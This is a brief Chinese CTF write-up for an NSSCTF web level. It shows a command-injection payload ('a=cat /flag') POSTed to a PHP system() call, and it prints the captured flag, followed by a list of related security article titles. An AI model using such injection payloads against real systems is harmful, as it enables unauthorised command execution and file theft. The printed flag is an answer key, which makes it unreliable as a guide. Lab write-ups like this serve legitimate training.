开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
浩浩测试一下25 分钟前
SQL注入高级绕过手法汇总 重点谈不譚网安1 小时前
CSRF请求伪造亿坊电商2 小时前
PHP框架在微服务迁移中能发挥什么作用?JM丫2 小时前
PWNOS:2.0(vulnhub靶机)生信碱移2 小时前
大语言模型时代,单细胞注释也需要集思广益(mLLMCelltype)帅云毅3 小时前
Web漏洞--XSS之订单系统和Shell箱子keep intensify3 小时前
Linux常用指令迷路的小绅士4 小时前
常见网络安全攻击类型深度剖析(三):DDoS攻击——分类、攻击机制及企业级防御策略OpenC++4 小时前
【C++QT】Buttons 按钮控件详解ALex_zry5 小时前
Docker Macvlan网络配置实战:解决“network already exists“错误